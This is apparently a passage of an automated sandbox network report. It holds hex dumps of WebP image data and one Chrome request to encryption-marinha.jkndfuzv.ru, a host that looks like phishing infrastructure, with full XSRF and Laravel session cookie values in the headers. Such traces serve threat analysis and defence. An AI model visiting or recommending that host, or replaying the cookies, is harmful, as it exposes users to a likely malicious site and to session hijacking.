                                                                  2025-03-14 11:31:03 UTC1369INData Raw: 08 00 00 00 1c 00 73 00 52 00 47 00 42 58 59 5a 20 00 00 00 00 00 00 6f a2 00 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 58 59 5a 20 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 70 61 72 61 00 00 00 00 00 04 00 00 00 02 66 66 00 00 f2 a7 00 00 0d 59 00 00 13 d0 00 00 0a 5b 00 00 00 00 00 00 00 00 6d 6c 75 63 00 00 00 00 00 00 00 01 00 00 00 0c 65 6e 55 53 00 00 00 20 00 00 00 1c 00 47 00 6f 00 6f 00 67 00 6c 00 65 00 20 00 49 00 6e 00 63 00 2e 00 20 00 32 00 30 00 31 00 36 41 4c 50 48 f7 02 00 00 01 0f 30 ff 11 11 82 6e b3 6d 75 04 eb 47 04 84 74 30 34 32 1a b7 b5 97 91 40 da c6 e8 60 5b a0 04 b2 25 b0 fc 05 36 18 f3 99 d9 cb 39 41 44 ff 27 40 fe 2c 66 cf
                                                                  Data Ascii: sRGBXYZ o8XYZ bXYZ $XYZ -paraffY[mlucenUS Google Inc. 2016ALPH0nmuGt042@`[%69AD'@,f
                                                                  2025-03-14 11:31:03 UTC1369INData Raw: c6 5c ba de ca 82 44 3d e9 29 c2 99 74 6a ec 2e c0 55 b7 98 29 db 7b 98 ad 4a 74 59 df a4 43 7f fa 96 d2 fc 1e a9 83 1d 98 3b ff d5 ec 64 6c 59 9a f0 03 d6 a5 4f 38 4e ec 3a 68 37 d3 07 fb 1f 84 dd 2f 8d c4 96 b3 84 dd 1e f9 3a 16 77 91 b1 ba 12 d0 75 12 2b a1 1c 4c b4 b5 ef d5 2e 35 28 73 57 9a 39 e9 98 64 58 e9 d0 b4 7b e8 16 21 56 f2 7a 79 75 96 46 6d ff f8 fd 8e 47 59 1e 51 75 fa 4f 1c f4 c0 2b 50 0d c7 38 64 77 5c 56 a5 36 ed b8 72 b8 da 1e 0e 0a 69 82 90 3b 33 be ae 6c f6 56 ae 05 a3 38 1d 8c d7 88 56 f9 80 6c 09 bd 3c 43 e9 8d ed 68 6b be 0e a3 c5 6a 53 7a fc 05 18 5f ac 03 2a 1b 77 43 cf e8 fb a2 b4 a2 f0 8e 71 6d 71 27 f8 cb 31 bb 4a bb 26 91 99 75 2b 90 dd d8 0d 1d 44 ab 0d ce 1a cd 88 75 03 8c 1b a0 f4 ce 87 95 9c ae fc 60 9d ec d2 13 50 73 5d
                                                                  Data Ascii: \D=)tj.U){JtYC;dlYO8N:h7/:wu+L.5(sW9dX{!VzyuFmGYQuO+P8dw\V6ri;3lV8Vl<ChkjSz_*wCqmq'1J&u+Du`Ps]
                                                                  2025-03-14 11:31:03 UTC1369INData Raw: 2a a0 bd 20 ab 2c 33 bf ed e2 04 dd e7 69 af e6 eb cd 7a 92 04 2b 72 c0 f1 dd 28 00 47 75 de 65 0f 38 5a 84 ae 02 51 db 09 ec 89 38 1e 98 43 cf 50 89 af 52 0d 45 89 6b 6b e5 cc 10 46 c7 86 d2 c0 50 f6 84 50 22 53 b0 b1 7d bf b9 ae 5e af 53 74 d8 04 f6 f9 68 ab b4 1b 06 c3 76 71 2d 6f 23 97 f3 73 1a 6a 3a 34 ed 64 31 3e bc cd 97 3c bf cd c3 35 b7 ee 21 9e 0e cb 60 1c 13 f6 47 8d d4 74 4e e0 42 d6 40 a4 4e af 30 f4 de b7 ac 74 6a e8 f4 a2 03 93 cd 92 0a ec 6d 09 b2 b7 8e a9 35 a1 a0 c3 75 bf b5 81 16 c7 f1 b1 d4 5d 3d 72 a4 be db b5 16 f7 dc 35 7e 55 7e c7 67 09 3c 8b e3 3b f8 a6 de 44 25 d1 d6 bb c3 38 29 fe eb ff 1a c7 ce 96 52 00 cb 29 c3 5e 1f 11 ef 1e ec a4 9e 8e c8 24 65 3f 8e 83 66 fe e9 b9 99 ad f8 c1 8b f1 dc 15 ca 57 a5 52 ef e0 00 0a ed 07 98 dd
                                                                  Data Ascii: * ,3iz+r(Gue8ZQ8CPREkkFPP"S}^Sthvq-o#sj:4d1><5!`GtNB@N0tjm5u]=r5~U~g<;D%8)R)^$e?fWR
                                                                  2025-03-14 11:31:03 UTC1369INData Raw: e3 7b f1 6e 91 51 f3 72 93 1b da 9c 8d 51 b5 80 14 56 d5 dd 0a 06 cc 31 7f 1f 1c bd 63 8d 49 38 5e b6 f0 af f8 b9 89 d6 f9 39 7d db ff ff c9 c1 ff f9 31 af ff f2 51 90 17 19 60 64 27 48 af 92 6b 57 59 68 96 10 7c 31 1e 74 e0 c0 e7 05 7b a2 b6 7e 70 27 82 e1 95 48 90 95 36 78 69 35 18 77 d4 8a 58 b7 d6 1e 8d 3d 07 d3 c4 f8 e3 ec e1 75 56 e1 b2 fd a3 56 b3 e0 ec ce 05 db 3e 96 80 d4 53 cf b1 f6 cf 43 88 fa ec 92 d2 4d 3d 83 cb de 8b 41 88 2e ec 4a 6c be 90 50 59 31 be 1b a5 22 95 36 76 11 da e5 9f d3 0b a5 ba 6d bd 03 6e 27 7d 7f bc 3e 2e a2 7d 38 75 67 b4 59 c4 69 e7 c4 e7 41 c2 08 5b c8 41 ba b8 a2 1e 09 93 8e 9e fd ea 07 be 14 ff 13 47 e8 71 18 0a 03 d3 4b 96 0e f1 fe 47 29 00 4d 09 85 0d b5 cb 4f f7 95 f4 37 24 fd a4 f6 ce cd 00 77 59 74 0f 9f 27 84 10
                                                                  Data Ascii: {nQrQV1cI8^9}1Q`d'HkWYh|1t{~p'H6xi5wX=uVV>SCM=A.JlPY1"6vmn'}>.}8ugYiA[AGqKG)MO7$wYt'
                                                                  2025-03-14 11:31:03 UTC1369INData Raw: 1f 2f 52 51 eb 41 e3 b9 f4 78 3b 1e d2 5b c8 13 56 e1 52 ee 73 92 22 48 f8 33 03 c3 2b 4e 89 20 3f 30 e1 97 38 b7 df b7 fc f8 6a 1e d0 6f 33 7d eb dc 1d 0c 0f 5b 85 66 dd 7b 62 68 03 df 43 73 08 8b 62 ae 56 56 80 af ff e4 eb 17 e9 85 6a 29 24 00 82 b7 11 17 09 0a ad 78 a4 63 80 f4 4f 58 cc 42 bd f1 85 3e 17 9d ba 4b a6 e2 ad 8e 77 1a c0 59 af 8b ae cb 6e 34 54 5d a6 1b 59 90 bf 71 df 7f aa 30 6a 46 6a b8 00 dc e4 d5 03 4e a0 92 26 32 58 b8 d2 0e b1 2c 8a 0a 02 41 e3 14 15 61 f0 79 07 70 c5 a5 c1 69 98 91 36 05 a7 39 88 36 2b 41 4e a0 e1 a8 8d 32 ae dd bf bd e4 40 d7 68 4c 5b 2d 09 00 df d1 8a af ad ad f8 87 e8 6a d3 4d 3a c1 c5 df af b1 1a cb 6f f2 75 41 d8 77 98 66 c3 3f 01 d9 24 9e 2b 91 2c f1 58 5f f3 05 80 6f 0e e0 e6 df 4d 56 68 75 04 7c 61 9b 75 f8
                                                                  Data Ascii: /RQAx;[VRs"H3+N ?08jo3}[f{bhCsbVVj)$xcOXB>KwYn4T]Yq0jFjN&2X,Aaypi696+AN2@hL[-jM:ouAwf?$+,X_oMVhu|au
                                                                  2025-03-14 11:31:03 UTC244INData Raw: c3 f0 1b af 55 0f d1 11 bc f1 97 09 a6 5c f0 54 03 32 1a e0 fd 7a 8f 26 ce d9 a5 88 e3 8f 6d 17 d7 fc 27 b9 c9 c7 3f bf e6 8a 2b 52 63 c7 f3 be 1a 36 2f 61 1c a5 70 03 c0 f8 e3 73 c8 0b 73 4c ed 9b ef da 31 4a ad f7 62 90 0d f7 d9 36 39 cc f9 64 80 e6 fa ef 79 d1 7a 95 ab a4 48 59 7d b5 9d 91 de ef 0c f2 4b 81 57 4f a7 7e 4e ee bd bb 1e bb d8 27 da 1b a2 15 6a 4d 2f 12 f6 35 d2 d1 4e 0b 5d fc e2 ec 02 21 c7 77 dd 0f e0 3f 65 e9 64 ef d4 d5 e0 b9 92 fd e8 0a 11 88 73 76 5b 4f 67 e6 fb e2 ef 9b 47 05 04 1e a4 30 91 04 9f 08 c2 7b 5e 0a 24 ef b0 d4 0a 27 35 4b 56 14 f8 e7 a3 94 90 36 91 b8 ef 1b 45 49 99 17 bf ce 20 3e 60 3c 7c 60 21 df 65 7b 3f 6b b9 01 f8 7f dc 63 80 8f 21 d2 23 ae dd 7f 9d 62 35 30 f3 7d dc 46 ee 5c 25 2d
                                                                  Data Ascii: U\T2z&m'?+Rc6/apssL1Jb69dyzHY}KWO~N'jM/5N]!w?edsv[OgG0{^$'5KV6EI >`<|`!e{?kc!#b50}F\%-
                                                                  2025-03-14 11:31:03 UTC1369INData Raw: 0a f3 1f d2 eb 5e b7 d1 51 64 c3 98 0a 99 8a a0 2c 28 09 7c 30 ba bf 48 8f e9 26 58 55 ff 7c 10 56 b3 a3 5b 86 4f 58 99 8c 82 c0 d7 9d 8c 50 56 9c 75 9b 20 99 9e bf 75 82 5b 71 0a 50 59 a6 38 a7 2d c6 e9 c9 d4 2b 5f 7f 73 bd 0c 18 f1 2a 6b 00 57 ee 6e de ad f7 a8 e2 72 66 12 e0 32 ac 01 92 57 32 c3 e7 de 22 67 08 77 2b 83 ff ba d4 00 c5 11 4a bf 87 87 a6 b6 d2 c2 9d 47 55 7b 94 bd 06 0e bd ce 5a a8 a5 67 22 aa 2f b1 57 8b 01 02 68 d3 39 63 41 89 4f 00 26 f5 ad c3 52 c9 4a cb 89 09 41 86 36 1b 40 d9 c3 cd 85 62 de 53 35 4d fe 81 27 4a f2 b4 14 6f ef 07 9c d2 ca 9d 14 3a a4 13 13 ca 4c 22 ef 82 89 ee 8f d6 a6 47 48 2a 82 df 7e 6a 44 1b 0f 6d 7c 30 b6 68 c5 0e c0 e2 02 4e df 8e 08 0f 55 2f 63 73 91 c2 82 f4 4e a5 31 66 56 4c cb af 00 9b f5 cc 5d 5d 11 ef b5
                                                                  Data Ascii: ^Qd,(|0H&XU|V[OXPVu u[qPY8-+_s*kWnrf2W2"gw+JGU{Zg"/Wh9cAO&RJA6@bS5M'Jo:L"GH*~jDm|0hNU/csN1fVL]]
                                                                  2025-03-14 11:31:03 UTC889INData Raw: 53 32 ad 6c c5 7c e0 e3 07 04 10 fd 7e b0 7a 35 b7 83 14 99 23 72 ab 96 98 26 c0 bd 3a 41 8f e9 ee b7 ae a1 32 0d 5d 64 5c 6a 5f 18 56 8b 77 03 1c 0e e8 36 f3 31 8e 8b 23 ae 78 88 e9 da d8 50 4c 73 2d 53 14 a4 a9 70 01 31 09 19 f9 80 4a bb 03 53 55 59 d3 bd 40 72 7e 26 4e b9 94 c5 f3 f1 1c 22 ae a1 6e c8 0d 53 87 5d a2 b6 19 23 57 47 80 c1 0c 78 90 83 e9 f0 e1 e8 98 3d 45 00 34 6e 41 b6 5e bd 32 25 7f b1 c5 80 aa 54 06 99 19 d5 62 1a 59 b4 61 bf 78 8c fa fb db fb ab 21 c8 0f 06 7a 54 3b c2 79 33 e8 ab 02 cb eb 92 65 f1 04 95 6a a3 42 45 5b 84 03 bf bf aa ef 4a a7 2c e6 ff d7 2f 3e f6 23 5c ef e4 72 77 a6 33 5b 0c 1b 05 ed 70 87 c5 32 43 7d e0 20 f6 9f 3d e5 4f 44 f0 e2 ab 6e 97 68 c0 54 65 ef dc 83 20 30 f8 0c d1 55 0e be dc 99 39 b5 df 5f db 56 a6 c1 cc
                                                                  Data Ascii: S2l|~z5#r&:A2]d\j_Vw61#xPLs-Sp1JSUY@r~&N"nS]#WGx=E4nA^2%TbYax!zT;y3ejBE[J,/>#\rw3[p2C} =ODnhTe 0U9_V


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  39192.168.2.449768104.21.43.1754435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:31:03 UTC1486OUTGET /stLx2AXVud2xlUwbPNljeDAzdhl4A2IPUOzzCg0S5LGrFzfplmnd34wtauD5gunMCnt6yZAef259 HTTP/1.1
                                                                  Host: encryption-marinha.jkndfuzv.ru
                                                                  Connection: keep-alive
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNX
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkdseWYxdzJpWGVTMEJydy94MkFEYUE9PSIsInZhbHVlIjoiVDlBTUxyMTdQRGFWdzZhSXNvKzBKUjM5WVFPZ3hER3crN2pEcjFiVUZCL0VSaENmUkxGMEVJNDhQeVAvOVpIS2RRdjRPOVE3OXcraFNBbmluRFA4VWFlZGdZVmhRVW5lelFlQXEzSFQrTjdhSWhmTjhqREQ4OVZmTDNVNlBsRVoiLCJtYWMiOiJkODczY2M4ZGQ1YWE1NjcyNmMxZTFiYmUyYmZhZmY4YTg3ZGM5NjMxZDNlNzQwMTgwYTZmM2Q4ZDQ1MmU1OWUyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImhtQlplWC81bVVjcEVwSHdEN1hDOUE9PSIsInZhbHVlIjoiOFZGZEdmSDh1NDhuYWprQU8zdFJEd3NQU0FyZExXbTBHUnV1UllEUUVIMHFYOEh0MW1VN2ZEV2tjVnU3Q3JKbEpxRkcvMUpmbjFiZndYR1dXanBKMjFIa2lXNlFvUGF5OVRkV2loL1BLOHNHdStpNU9nS3EzdVNhbDVhRUttby8iLCJtYWMiOiIxMzRjZjM5MWYzMGNmMzBiNzJmOGE4MWNhNTJmYWQwN2Q4NDc3M2U0MDMyOTIyZGYyMzM0YmYzYTdhOWVjOTdiIiwidGFnIjoiIn0%3D
                                                                  2025-03-14 11:31:03 UTC1088INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:31:03 GMT
                                                                  Content-Type: image/webp
                                                                  Content-Length: 17842
                                                                  Connection: close
                                                                  Content-Disposition: inline; filename="stLx2AXVud2xlUwbPNljeDAzdhl4A2IPUOzzCg0S5LGrFzfplmnd34wtauD5gunMCnt6yZAef259"
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9AXDADVfjhgDWk5TMa9lfgJy4Lqr4CivRsMFz5hN9fwMBcu5NRlBLALVWsTeOJNOhObCXSE%2FAt38BqIBLpcdn9Zpr%2B8dFH29WzPeRBsE4sLriRWY1vgEqu1IP9cs"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4557&min_rtt=4553&rtt_var=1717&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2394&delivery_rate=620344&cwnd=251&unsent_bytes=0&cid=58b0012084c7c506&ts=97&x=0"
                                                                  Server: cloudflare
                                                                  CF-RAY: 9203714a1bc78c84-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1799&min_rtt=1793&rtt_var=686&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2058&delivery_rate=1580086&cwnd=155&unsent_bytes=0&cid=0b85d314c4cc13eb&ts=309&x=0"
                                                                  2025-03-14 11:31:03 UTC281INData Raw: 52 49 46 46 aa 45 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 30 00 00 00 8d 09 00 82 03 00 49 43 43 50 c8 01 00 00 00 00 01 c8 00 00 00 00 04 30 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e0 00 01 00 01 00 00 00 00 00 00 61 63 73 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 f6 d6 00 01 00 00 00 00 d3 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 64 65 73 63 00 00 00 f0 00 00 00 24 72 58 59 5a 00 00 01 14 00 00 00 14 67 58 59 5a 00 00 01 28 00 00 00 14 62 58 59 5a 00 00 01 3c 00 00 00 14 77 74 70 74 00 00 01 50 00 00 00 14 72 54 52 43 00 00 01 64 00 00 00 28 67 54 52 43 00 00 01 64 00 00 00 28 62
                                                                  Data Ascii: RIFFEWEBPVP8X0ICCP0mntrRGB XYZ acsp-desc$rXYZgXYZ(bXYZ<wtptPrTRCd(gTRCd(b
                                                                  2025-03-14 11:31:03 UTC1369INData Raw: 63 00 00 00 00 00 00 00 01 00 00 00 0c 65 6e 55 53 00 00 00 08 00 00 00 1c 00 73 00 52 00 47 00 42 58 59 5a 20 00 00 00 00 00 00 6f a2 00 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 58 59 5a 20 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 70 61 72 61 00 00 00 00 00 04 00 00 00 02 66 66 00 00 f2 a7 00 00 0d 59 00 00 13 d0 00 00 0a 5b 00 00 00 00 00 00 00 00 6d 6c 75 63 00 00 00 00 00 00 00 01 00 00 00 0c 65 6e 55 53 00 00 00 20 00 00 00 1c 00 47 00 6f 00 6f 00 67 00 6c 00 65 00 20 00 49 00 6e 00 63 00 2e 00 20 00 32 00 30 00 31 00 36 41 4c 50 48 e9 2c 00 00 0d 24 c5 6d db 38 d2 fe 6b a7 5c bf 6f 44 4c 80 cf 8b 20 0b c4 54 55 8a 05 ce ab 8e 33 27 f4 7b ed 67
                                                                  Data Ascii: cenUSsRGBXYZ o8XYZ bXYZ $XYZ -paraffY[mlucenUS Google Inc. 2016ALPH,$m8k\oDL TU3'{g
                                                                  2025-03-14 11:31:03 UTC244INData Raw: b4 9f 92 44 0a 87 67 9c dd 45 1a de f7 f8 78 6e be 88 9c 98 c6 fa 6d e1 da 6e 7e dc a7 9b 3e 81 c3 0b 72 ac 79 df e3 63 ba 9f 6c 3e e2 01 2b b8 cd ad 2d 99 40 51 1d 4f e1 84 cf b6 1c f4 87 17 a4 df f6 bc c3 c7 d5 a8 90 8b e8 30 df 6c 45 03 fd c7 c2 7d 3e 1a ff 41 ea ac ef 2b 7c 68 ab 47 99 89 e8 30 e3 f5 9a c6 fe 18 cb d5 a3 ac 61 ec 12 30 9f 8f 04 d2 ee 7b 8e 8f ef ee ca 66 c1 04 d6 72 85 29 97 28 0c 94 a2 1b f0 e9 b6 23 3b 22 e1 ba ef 39 16 f4 18 00 b4 4d 16 d0 32 07 a6 91 e7 f0 0b ab d6 55 a4 2e 56 bb 29 8d bb ea c8 d4 a7 1b 0e 72 95 10 ff 86 65 7c 0a de 47 1f f1 db 30 a2 66 35 63 ac 49 ab d9 9a f4 5a 83 c4 4f 3e b8 e8 f1 7b 3f a1 66 35 6b db 2e 1f be aa d1 5c fb 52 49 14 57 3e 56 44 4f f8 74 cb c8 06 7c 2c 4f ce 39 bc
                                                                  Data Ascii: DgExnmn~>rycl>+-@QO0lE}>A+|hG0a0{fr)(#;"9M2U.V)re|G0f5cIZO>{?f5k.\RIW>VDOt|,O9
                                                                  2025-03-14 11:31:03 UTC1369INData Raw: 3b fa e8 bd bf e2 fd 2e 21 28 95 5c 6d 90 f2 c9 3a 87 77 47 1f 7d 08 03 63 9c 6d b2 58 d9 94 ba 54 a2 3c de 68 9a d3 b7 cf 37 2d 99 f9 48 1c ad 03 61 70 76 e8 55 93 4c b3 35 a9 59 a4 3b 6a 0b 4a ef 9d 9f 38 ef ab 75 93 de c5 32 09 14 d8 5c ed 29 a6 1d 3e df 32 32 fb 61 18 b5 05 79 b4 ea 56 6d 12 81 d4 89 69 24 7b 30 3f 40 1f 9c b3 db be af d2 aa d7 35 aa ad 5d 4c 10 db fd f9 c6 3d 3e e1 d6 54 27 7c 10 07 fd 1d 69 5a b5 55 55 1a 9b 2b 9f 54 df a4 72 50 48 d6 5a 7b d7 ef 52 da 50 7c f1 b9 b5 2b 04 90 ba 48 6d 53 24 88 eb 7f ce 75 da e3 33 ee 86 ca 7d 0c 0e 1a 09 6b f3 d4 25 01 61 52 6a 15 d2 1c 04 d2 36 f6 24 45 95 0c a9 c1 0a e5 66 0a 25 52 28 b4 3e 9a e6 2c 8f df f0 19 d9 7f 04 06 89 b4 83 b8 df 27 d1 db 94 2c 92 9c c4 4f 24 1f b4 bd 97 55 7e 71 8d 02 52
                                                                  Data Ascii: ;.!(\m:wG}cmXT<h7-HapvUL5Y;jJ8u2\)>22ayVmi${0?@5]L=>T'|iZUU+TrPHZ{RP|+HmS$u3}k%aRj6$Ef%R(>,',O$U~qR
                                                                  2025-03-14 11:31:03 UTC1369INData Raw: 53 6d 6d 56 02 94 66 a1 08 85 25 c8 34 b2 6f 0d 8a d9 99 83 8e b9 d4 06 73 5b eb 06 a5 ec d4 28 e3 45 a9 07 b1 25 6a 2b 22 3b 3b a4 71 05 c2 dd 34 24 90 3a 2b 49 31 fe 58 24 ad c1 22 64 1a d9 ab 3d 4a fa f5 4e ba 3c 98 c1 dc 4a 89 92 ee 1f a5 bd 24 49 a2 e9 85 88 63 39 ad 42 6a 49 b3 b9 f2 19 71 50 6a 2c 51 29 b0 08 99 46 ee cc a0 b0 8d 19 54 0e 42 60 66 5b 83 c2 56 66 92 f1 62 c4 41 6c 91 d5 80 b9 65 6b 17 46 d0 40 98 8c 04 89 59 20 b5 c1 32 6c 0d 72 97 7b 94 f7 eb b6 8f c9 a9 06 33 db 2b 94 77 7f 2f fd a5 48 51 e9 bc ec ec d4 14 c3 2a 44 3c ee 4b d5 76 14 07 2c 4f a6 b1 0c 6b 83 cc 6b 8d 22 77 87 de 27 66 30 b7 ba 41 89 37 4f da 5e 86 7a 10 0f 20 6e 41 ec 66 67 fd d2 08 9a ea ce 64 23 40 69 96 47 2f b1 10 35 32 6f 0d 0a 5d 1d 8d 49 ca 60 66 6b 8b 42 57
                                                                  Data Ascii: SmmVf%4os[(E%j+";;q4$:+I1X$"d=JN<J$Ic9BjIqPj,Q)FTB`f[VfbAlekF@Y 2lr{3+w/HQ*D<Kv,Okk"w'f0A7O^z nAfgd#@iG/52o]I`fkBW
                                                                  2025-03-14 11:31:03 UTC1369INData Raw: 7d 41 8a 41 b9 7b 59 25 c0 ab 44 46 f9 13 d4 51 db c7 5d 1a 78 38 86 37 5c 78 47 81 84 2b a2 f8 1b d1 21 ff e6 60 4c 22 ac 2c a8 e4 bd 70 eb 04 30 82 46 98 94 04 28 0d 96 a3 40 aa c7 af 48 d5 a8 ad 6a 4a 32 a8 57 9c 31 5a 33 0a 59 bd a9 4e e5 f1 1b 52 0c e2 56 55 49 54 f7 3a 8f e1 7b 12 40 d4 e6 5e 56 64 06 69 3e 3d 23 c5 20 af 4c 95 04 94 ba 10 3d 7e 43 c2 2d 52 14 1d 4a 58 e9 51 a5 51 de c6 9c 54 5c 27 b8 ab 48 aa ad 4d 48 92 e8 e5 50 cb 44 26 f1 8a 84 8d ba 97 55 29 26 f9 03 e7 0e c6 dc cb ea 0d 12 49 4e 3d 52 d5 f6 69 93 02 a4 89 67 a9 2b 2a 85 64 a3 b6 5f f6 44 02 49 4e 02 a9 5a 79 dc 24 b1 1f c2 25 e8 28 91 74 12 7c 8f 42 7e bd 11 b3 04 3c dc 49 bf 46 00 23 48 20 4c 3a 1c 94 03 96 a3 44 9a a7 3d 12 57 f6 71 57 86 61 0f ca a8 cd e3 9f 6a 91 c4 69 87
                                                                  Data Ascii: }AA{Y%DFQ]x87\xG+!`L",p0F(@HjJ2W1Z3YNRVUIT:{@^Vdi>=# L=~C-RJXQQT\'HMHPD&U)&IN=Rig+*d_DINZy$%(t|B~<IF#H L:D=WqWaji
                                                                  2025-03-14 11:31:03 UTC1369INData Raw: 4e c8 dd f6 c9 61 e8 e8 b0 31 47 1d f3 62 64 d3 4b 76 db 8a 8a f9 0b 12 36 c7 de d3 24 3d ee 91 66 e4 5f f6 29 08 73 b6 f4 83 b3 6e 2b 76 49 ed 87 f0 19 a5 59 18 8f ef e9 16 c6 b0 30 e2 71 4f d2 dc 5a 0a 06 ca e9 65 41 19 cc b7 4b 8c 91 d9 ec c2 55 43 c5 dd bb 1c 4f 00 f8 7a a7 4d 56 9c cc 22 7b c7 2f 69 a8 8e ca 15 e2 b4 47 b2 62 bb 4f a0 da da 52 fc 6a cd 49 c8 2a 1d 28 f5 09 e5 5f 5d 23 48 20 0c 85 24 b1 58 8e 2d 96 cb 09 69 d7 55 f1 60 7b aa 36 e4 81 46 6d 95 c9 88 91 b9 f2 35 e3 45 09 95 3d 98 22 9c 1e 90 b0 d8 ee e9 d0 17 05 08 c6 dc cb 2a 99 fd 10 56 05 dc f5 86 64 37 c4 f3 d5 3b 12 bd 20 18 d9 f8 73 be 5c 62 0c d4 d3 8f fc 3c a3 6a c6 f7 dd 56 49 00 8d da 2a 93 4b 8b f9 03 77 1f bc ed b9 58 0d 56 b3 2a 3d e0 f9 68 0b 30 ee 91 b4 f8 b2 99 1b 20 6a
                                                                  Data Ascii: Na1GbdKv6$=f_)sn+vIY0qOZeAKUCOzMV"{/iGbORjI*(_]#H $X-iU`{6Fm5E="*Vd7; s\b<jVI*KwXV*=h0 j
                                                                  2025-03-14 11:31:03 UTC1369INData Raw: f1 fb e2 ba b0 8e 64 80 32 8f fb 5c b0 f9 22 72 f8 b7 d3 f6 54 dc 9d 61 e8 0a 36 f3 63 43 b4 46 68 6f 1b 0a 48 fd 87 7a 47 62 70 b9 f6 8c aa 0d 73 10 12 40 94 83 da 67 82 dd 8d 9e 2b 76 b9 72 9c aa 8e 67 08 ed 47 25 b4 ab 0b 30 82 a4 77 f1 77 02 cb ca 71 2a e6 17 53 ac e7 a0 25 4b 34 a8 41 ed f3 80 32 21 bd 3a 16 a1 a2 1a 2f 58 cc 7f a0 d6 18 89 aa ad fd 9d 24 39 62 79 57 d3 62 9a 47 ba 98 06 10 d4 a0 f6 59 54 4f e2 7d 9e 51 31 5f 04 f2 70 c1 09 2d d5 59 3d 5b 0f 0a a7 1d 05 84 f9 0d 07 a9 59 60 60 fe a3 c0 7c 09 e8 7d 2a 40 50 83 90 55 7a e8 ae ed bb 62 4d 55 46 4e 76 d1 1d 3a a2 36 9c 21 b4 eb 41 d0 92 a4 1b c3 2f 92 64 7a 59 62 6d 58 4a 8e 53 d5 b1 04 9c 2c e9 60 f4 9d e8 92 83 96 ef a2 ef 86 12 d0 bb 4b 0e 79 33 9e c1 33 22 ee 0a 76 5a 1f 71 37 0d 05
                                                                  Data Ascii: d2\"rTa6cCFhoHzGbps@g+vrgG%0wwq*S%K4A2!:/X$9byWbGYTO}Q1_p-Y=[Y``|}*@PUzbMUFNv:6!A/dzYbmXJS,`Ky33"vZq7
                                                                  2025-03-14 11:31:03 UTC1369INData Raw: 7f 65 b2 91 0f 37 73 01 2d e9 f0 30 99 0c 14 e8 c7 1f 67 51 5c 84 59 80 11 74 d8 6d 65 06 02 f4 d3 cb 8c 38 4e d5 db d9 40 f7 64 74 01 5a 03 fa f1 3b 45 3c ee 89 aa 27 19 93 d2 20 3f e0 ac bb 27 69 f3 63 1a 09 1e b0 7a 68 44 62 7a f1 40 a9 14 f0 7c 25 f2 68 0d 66 d4 dc 55 74 78 1e 4c 72 a2 49 40 e1 bc dd 93 55 39 b4 54 ee 0c ee 7a 43 87 87 c9 24 c7 1e 12 d0 58 90 cd b5 9f 0d 54 ea 56 fa dc 6a 83 04 2d 48 95 22 c2 e6 b1 4f 49 82 de 9c 07 95 b9 12 31 33 a6 91 a2 59 41 b8 ab 92 3a bd 2e 1f 77 d5 a5 80 fd 56 e4 20 05 66 55 cb 04 f0 3c 98 c4 44 07 fa f1 e5 4c a8 e4 bd 70 c5 39 ab 96 09 e0 79 30 89 31 0d fa e9 79 49 40 98 f9 00 3a 7d 52 21 2b a6 91 a2 a6 09 c3 9e 08 dd bd 48 47 6c e8 c6 1f 67 02 76 4f 46 65 d5 4b a4 78 fa b9 7e 00 23 92 32 58 c0 4a 25 81 fd 97
                                                                  Data Ascii: e7s-0gQ\Ytme8N@dtZ;E<' ?'iczhDbz@|%hfUtxLrI@U9TzC$XTVj-H"OI13YA:.wV fU<DLp9y01yI@:}R!+HGlgvOFeKx~#2XJ%
                                                                  2025-03-14 11:31:03 UTC79INData Raw: ca a7 6a 26 a6 3d 66 56 82 b6 7f 6a e6 42 60 9e 6d ff 41 1a 1f 90 70 50 a6 70 87 d7 59 bb c7 ba 62 3c ee 13 38 62 61 07 e1 3e 06 f0 ca ce 84 c4 cc 1e 40 1c c5 a1 9a 87 7b cc b4 11 1f a3 69 8f a4 ed e9 6b d1 4e ff 60 ce 0f af 2b 0b 30 22
                                                                  Data Ascii: j&=fVjB`mApPpYb<8ba>@{ikN`+0"


